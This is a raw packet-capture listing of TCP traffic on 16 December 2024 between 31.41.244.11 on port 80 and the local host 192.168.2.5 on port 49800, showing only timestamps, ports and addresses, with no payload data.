Dec 16, 2024 11:03:20.718344927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.718475103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.719199896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.719290972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.719338894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.720323086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.720366955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.720417976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.720462084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.721530914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.721637964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.721651077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.721669912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.722750902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.722825050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.722887039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.723794937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.723845005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.723906040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.723994970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.724941015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.725003004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.725043058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.725081921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.726098061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.726231098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.726290941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.727263927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.727462053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.727493048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.727509975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.728410006 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.728456974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.728566885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.728611946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.729576111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.729691029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.729722023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.729737043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.730705976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.730756998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.730809927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.730851889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.731885910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.732013941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.732058048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.733028889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.733073950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.733167887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.733227968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.734194040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.734241009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.734297037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.734357119 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.735358953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.735434055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.735457897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.735507011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.736550093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.736605883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.736685038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.736861944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.737652063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.737848043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.737893105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.738914967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.738960981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.738989115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.739032030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.739979982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.740042925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.740124941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.740170002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.741117001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.741168022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.741233110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.741271973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.742281914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.742408037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.742432117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.742444992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.743417025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.743536949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.743581057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.744718075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.744745016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.744761944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.744782925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.745740891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.745865107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.745879889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.745906115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.746927023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.746980906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.747039080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.747085094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.748050928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.748095036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.748100042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.748184919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.749262094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.749325037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.749372005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.750386000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.750432014 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.750469923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.750511885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.751574039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.751621008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.751626968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.751672029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.752756119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.752799988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.753020048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.753063917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.753988981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.754034042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.754101038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.754143953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.755043983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.755112886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.755194902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.755237103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.756166935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.756210089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.756484032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.756526947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.757327080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.757376909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.757561922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.757606030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.758445978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.758490086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.758552074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.758594990 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.759613037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.759658098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.759735107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.759778976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.760751963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.760797024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.892368078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.892522097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.892538071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.892581940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.892913103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.892961979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.892997026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.893040895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.894018888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.894064903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.894126892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.894171953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.895149946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.895196915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.895276070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.895332098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.896317959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.896364927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.896424055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.896467924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.897492886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.897540092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.897613049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.897656918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.898641109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.898706913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.898721933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.898765087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.899800062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.899849892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.899863958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.899908066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.900995970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.901041985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.901106119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.901149988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.902205944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.902250051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.902251005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.902297020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.903292894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.903332949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.903454065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.903496981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.904405117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.904449940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.904526949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.904570103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.905560970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.905611992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.905651093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.905704021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.906716108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.906764030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.906858921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.906905890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.907875061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.907918930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.907989025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.908035040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.909032106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.909075975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.909137011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.909178972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.910269022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.910315037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.910316944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.910366058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.911362886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.911407948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.911417961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.911461115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.912548065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.912591934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.912594080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.912627935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.913666010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.913708925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.913728952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.913772106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.914818048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.914882898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.914923906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.914968967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.915963888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.916012049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.916070938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.916115999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.917120934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.917165995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.917223930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.917268038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.918283939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.918329000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.918397903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.918442965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.919465065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.919508934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.919672012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.919717073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.920612097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.920656919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.920744896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.920806885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.921761990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.921808004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.921844006 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.921888113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.922924995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.922970057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.923037052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.923084021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.924056053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.924101114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.924161911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.924205065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.925211906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.925276995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.925297976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.925344944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.926476955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.926521063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.926562071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.926604033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.927532911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.927575111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.927638054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.927686930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.928678036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.928724051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.928782940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.928828001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.929842949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.929888010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.929934978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.929980040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.931014061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.931061029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.931083918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.931128025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.932229996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.932274103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.932298899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.932342052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.933305979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.933350086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.933419943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.933465004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.934463024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.934506893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.934597015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.934638977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.935677052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.935744047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.935777903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.935817957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.936788082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.936909914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.936958075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.937956095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.938086987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.938133955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.939100027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.939124107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.939143896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.939172983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.940315962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.940362930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.940454960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.940499067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.941406965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.941452980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.941488028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.941534042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.942538023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.942583084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.942642927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.942687035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.943701029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.943744898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.943808079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.943851948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.944883108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.944928885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.944941998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.944986105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.946038008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.946105957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.946140051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.946183920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.947173119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.947220087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.947285891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.947329998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.948348045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.948394060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.948470116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.948514938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.949475050 CET	80	49800	31.41.244.11	192.168.2.5
